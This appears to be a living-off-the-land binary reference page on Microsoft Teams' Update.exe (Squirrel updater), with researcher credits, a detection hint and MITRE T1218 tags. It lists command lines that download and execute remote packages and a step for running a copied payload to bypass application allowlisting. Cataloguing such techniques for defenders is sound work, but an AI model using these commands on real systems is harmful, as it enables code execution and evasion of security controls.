.. / Update.exe
Star

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.


Paths:


Resources:
https://www.youtube.com/watch?v=rOP3hnkj7ls
https://twitter.com/reegun21/status/1144182772623269889
https://twitter.com/MrUn1k0d3r/status/1143928885211537408
http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

Acknowledgement:
Reegun J (OCBC Bank) - @reegun21
Mr.Un1k0d3r - @MrUn1k0d3r
Adam - @Hexacorn


Detection:
Update.exe spawned an unknown process



Download

The above binary will go to url and look for RELEASES file and download the nuget package.
Update.exe --download [url to package]
Usecase:Download binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



AWL bypass

The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update [url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRoolback=[url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase:Application Whitelisting Bypass
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



Execute

The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update [url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback=[url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase:Execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218